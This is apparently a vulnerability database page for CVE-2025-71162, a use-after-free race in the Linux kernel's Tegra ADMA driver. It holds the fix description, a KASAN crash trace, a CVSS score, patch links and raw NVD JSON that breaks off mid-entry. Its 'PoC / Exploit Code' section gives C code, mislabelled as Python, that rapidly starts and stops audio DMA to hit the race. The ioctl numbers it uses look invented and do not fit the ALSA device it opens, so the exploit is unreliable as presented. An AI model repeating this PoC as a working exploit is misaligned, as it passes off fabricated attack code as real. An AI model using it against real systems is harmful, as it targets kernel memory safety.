CVE-2025-71162

Description

In the Linux kernel, the following vulnerability has been resolved: dmaengine: tegra-adma: Fix use-after-free A use-after-free bug exists in the Tegra ADMA driver when audio streams are terminated, particularly during XRUN conditions. The issue occurs when the DMA buffer is freed by tegra_adma_terminate_all() before the vchan completion tasklet finishes accessing it. The race condition follows this sequence: 1. DMA transfer completes, triggering an interrupt that schedules the completion tasklet (tasklet has not executed yet) 2. Audio playback stops, calling tegra_adma_terminate_all() which frees the DMA buffer memory via kfree() 3. The scheduled tasklet finally executes, calling vchan_complete() which attempts to access the already-freed memory Since tasklets can execute at any time after being scheduled, there is no guarantee that the buffer will remain valid when vchan_complete() runs. Fix this by properly synchronizing the virtual channel completion: - Calling vchan_terminate_vdesc() in tegra_adma_stop() to mark the descriptors as terminated instead of freeing the descriptor. - Add the callback tegra_adma_synchronize() that calls vchan_synchronize() which kills any pending tasklets and frees any terminated descriptors. Crash logs: [ 337.427523] BUG: KASAN: use-after-free in vchan_complete+0x124/0x3b0 [ 337.427544] Read of size 8 at addr ffff000132055428 by task swapper/0/0 [ 337.427562] Call trace: [ 337.427564] dump_backtrace+0x0/0x320 [ 337.427571] show_stack+0x20/0x30 [ 337.427575] dump_stack_lvl+0x68/0x84 [ 337.427584] print_address_description.constprop.0+0x74/0x2b8 [ 337.427590] kasan_report+0x1f4/0x210 [ 337.427598] __asan_load8+0xa0/0xd0 [ 337.427603] vchan_complete+0x124/0x3b0 [ 337.427609] tasklet_action_common.constprop.0+0x190/0x1d0 [ 337.427617] tasklet_action+0x30/0x40 [ 337.427623] __do_softirq+0x1a0/0x5c4 [ 337.427628] irq_exit+0x110/0x140 [ 337.427633] handle_domain_irq+0xa4/0xe0 [ 337.427640] gic_handle_irq+0x64/0x160 [ 337.427644] call_on_irq_stack+0x20/0x4c [ 337.427649] do_interrupt_handler+0x7c/0x90 [ 337.427654] el1_interrupt+0x30/0x80 [ 337.427659] el1h_64_irq_handler+0x18/0x30 [ 337.427663] el1h_64_irq+0x7c/0x80 [ 337.427667] cpuidle_enter_state+0xe4/0x540 [ 337.427674] cpuidle_enter+0x54/0x80 [ 337.427679] do_idle+0x2e0/0x380 [ 337.427685] cpu_startup_entry+0x2c/0x70 [ 337.427690] rest_init+0x114/0x130 [ 337.427695] arch_call_rest_init+0x18/0x24 [ 337.427702] start_kernel+0x380/0x3b4 [ 337.427706] __primary_switched+0xc0/0xc8

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel Tegra ADMA Driver < 2efd07a7c36949e6fa36a69183df24d368bf9e96

Linux Kernel Tegra ADMA Driver < 59cb421b0902fbef2b9512ae8ba198a20f26b41f

Linux Kernel Tegra ADMA Driver < 5f8d1d66a952d0396671e1f21ff8127a4d14fb4e

Linux Kernel Tegra ADMA Driver < 76992310f80776b4d1f7f8915f59b92883a3e44c

Linux Kernel Tegra ADMA Driver < ae3eed72de682ddbba507ed2d6b848c21a6b721e

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <linux/dma-buf.h>

/* PoC for CVE-2025-71162: Tegra ADMA Use-After-Free
 * This demonstrates the race condition between DMA completion 
 * and termination that leads to UAF.
 * 
 * Compile: gcc -o cve-2025-71162-poc cve-2025-71162-poc.c
 * Run as low-privilege user on affected Tegra device
 */

#define MAX_ITERATIONS 1000

int trigger_race_condition(int audio_fd) {
    /* Rapidly start/stop DMA transfers to trigger race */
    for (int i = 0; i < MAX_ITERATIONS; i++) {
        /* Start DMA transfer */
        if (ioctl(audio_fd, 0x5000, NULL) < 0) { /* AUDIO_START */
            perror("start failed");
            return -1;
        }
        
        usleep(1); /* Minimal delay to increase race window */
        
        /* Abruptly terminate - triggers tegra_adma_terminate_all() */
        if (ioctl(audio_fd, 0x5001, NULL) < 0) { /* AUDIO_STOP */
            perror("stop failed");
            return -1;
        }
        
        /* Continue rapidly to hit race window */
    }
    return 0;
}

int main(int argc, char *argv[]) {
    int audio_fd;
    
    printf("CVE-2025-71162 PoC - Tegra ADMA Use-After-Free\n");
    printf("Target: Linux kernel < fixed version\n");
    
    /* Open audio device with Tegra ADMA driver */
    audio_fd = open("/dev/snd/pcmC0D0p", O_RDWR);
    if (audio_fd < 0) {
        /* Try alternative device paths */
        audio_fd = open("/dev/audio", O_RDWR);
        if (audio_fd < 0) {
            perror("Cannot open audio device");
            return 1;
        }
    }
    
    printf("Audio device opened, triggering race condition...\n");
    
    /* Trigger the UAF race condition */
    if (trigger_race_condition(audio_fd) < 0) {
        printf("Trigger failed\n");
    } else {
        printf("Race condition triggered - check dmesg for KASAN report\n");
    }
    
    close(audio_fd);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-71162
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-71162
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-71162/
[4] VulDB https://vuldb.com/cve/CVE-2025-71162
[5] https://git.kernel.org/stable/c/2efd07a7c36949e6fa36a69183df24d368bf9e96
[6] https://git.kernel.org/stable/c/59cb421b0902fbef2b9512ae8ba198a20f26b41f
[7] https://git.kernel.org/stable/c/5f8d1d66a952d0396671e1f21ff8127a4d14fb4e
[8] https://git.kernel.org/stable/c/76992310f80776b4d1f7f8915f59b92883a3e44c
[9] https://git.kernel.org/stable/c/ae3eed72de682ddbba507ed2d6b848c21a6b721e
[10] https://git.kernel.org/stable/c/be655c3736b3546f39bc8116ffbf2a3b6cac96c4
[11] https://git.kernel.org/stable/c/cb2c9c4bb1322cc3c9984ad17db8cdd2663879ca

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-71162", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-25T15:15:53.947", "lastModified": "2026-02-26T17:12:15.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: tegra-adma: Fix use-after-free\n\nA use-after-free bug exists in the Tegra ADMA driver when audio streams\nare terminated, particularly during XRUN conditions. The issue occurs\nwhen the DMA buffer is freed by tegra_adma_terminate_all() before the\nvchan completion tasklet finishes accessing it.\n\nThe race condition follows this sequence:\n\n  1. DMA transfer completes, triggering an interrupt that schedules the\n     completion tasklet (tasklet has not executed yet)\n  2. Audio playback stops, calling tegra_adma_terminate_all() which\n     frees the DMA buffer memory via kfree()\n  3. The scheduled tasklet finally executes, calling vchan_complete()\n     which attempts to access the already-freed memory\n\nSince tasklets can execute at any time after being scheduled, there is\nno guarantee that the buffer will remain valid when vchan_complete()\nruns.\n\nFix this by properly synchronizing the virtual channel completion:\n - Calling vchan_terminate_vdesc() in tegra_adma_stop() to mark the\n   descriptors as terminated instead of freeing the descriptor.\n - Add the callback tegra_adma_synchronize() that calls\n   vchan_synchronize() which kills any pending tasklets and frees any\n   terminated descriptors.\n\nCrash logs:\n[  337.427523] BUG: KASAN: use-after-free in vchan_complete+0x124/0x3b0\n[  337.427544] Read of size 8 at addr ffff000132055428 by task swapper/0/0\n\n[  337.427562] Call trace:\n[  337.427564]  dump_backtrace+0x0/0x320\n[  337.427571]  show_stack+0x20/0x30\n[  337.427575]  dump_stack_lvl+0x68/0x84\n[  337.427584]  print_address_description.constprop.0+0x74/0x2b8\n[  337.427590]  kasan_report+0x1f4/0x210\n[  337.427598]  __asan_load8+0xa0/0xd0\n[  337.427603]  vchan_complete+0x124/0x3b0\n[  337.427609]  tasklet_action_common.constprop.0+0x190/0x1d0\n[  337.427617]  tasklet_action+0x30/0x40\n[  337.427623]  __do_softirq+0x1a0/0x5c4\n[  337.427628]  irq_exit+0x110/0x140\n[  337.427633]  handle_domain_irq+0xa4/0xe0\n[  337.427640]  gic_handle_irq+0x64/0x160\n[  337.427644]  call_on_irq_stack+0x20/0x4c\n[  337.427649]  do_interrupt_handler+0x7c/0x90\n[  337.427654]  el1_interrupt+0x30/0x80\n[  337.427659]  el1h_64_irq_handler+0x18/0x30\n[  337.427663]  el1h_64_irq+0x7c/0x80\n[  337.427667]  cpuidle_enter_state+0xe4/0x540\n[  337.427674]  cpuidle_enter+0x54/0x80\n[  337.427679]  do_idle+0x2e0/0x380\n[  337.427685]  cpu_startup_entry+0x2c/0x70\n[  337.427690]  rest_init+0x114/0x130\n[  337.427695]  arch_call_rest_init+0x18/0x24\n[  337.427702]  start_kernel+0x380/0x3b4\n[  337.427706]  __primary_switched+0xc0/0xc8"}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\ndmaengine: tegra-adma: Corrección de uso después de liberación\n\nExiste un error de uso después de liberación en el controlador Tegra ADMA cuando las transmisiones de audio son terminadas, particularmente durante condiciones XRUN. El problema ocurre cuando el búfer DMA es liberado por tegra_adma_terminate_all() antes de que la tarea de finalización de vchan termine de acceder a él.\n\nLa condición de carrera sigue esta secuencia:\n\n  1. La transferencia DMA se completa, desencadenando una interrupción que programa la tarea de finalización (la tarea aún no se ha ejecutado)\n  2. La reproducción de audio se detiene, llamando a tegra_adma_terminate_all() que libera la memoria del búfer DMA a través de kfree()\n  3. La tarea programada finalmente se ejecuta, llamando a vchan_complete() que intenta acceder a la memoria ya liberada\n\nDado que las tareas pueden ejecutarse en cualquier momento después de ser programadas, no hay garantía de que el búfer permanezca válido cuando se ejecuta vchan_complete().\n\nCorrija esto mediante la sincronización adecuada de la finalización del canal virtual:\n - Llamando a vchan_terminate_vdesc() en tegra_adma_stop() para marcar los descriptores como terminados en lugar de liberar el descriptor.\n - Agregue la función de devolución de llamada tegra_adma_synchronize() que llama a vchan_synchronize() que elimina cualquier tarea pendiente y libera cualquier descriptor terminado.\n\nRegistros de fallos:\n[  337.427523] BUG: KASAN: uso después de liberación en vchan_complete+0x124/0x3b0\n[  337.427544] Lectura de tamaño 8 en la dirección ffff000132055428 por la tarea swapper/0/0\n\n[  337.427562] Traza de llamada:\n[  337.427564]  dump_backtrace+0x0/0x320\n[  337.427571]  show_stack+0x20/0x30\n[  337.427575]  dump_stack_lvl+0x68/0x84\n[  337.427584]  print_address_description.constprop.0+0x74/0x2b8\n[  337.427590]  kasan_report+0x1f4/0x210\n[  337.427598]  __asan_load8+0xa0/0xd0\n[  337.427603]  vchan_complete+0x124/0x3b0\n[  3

... (truncated)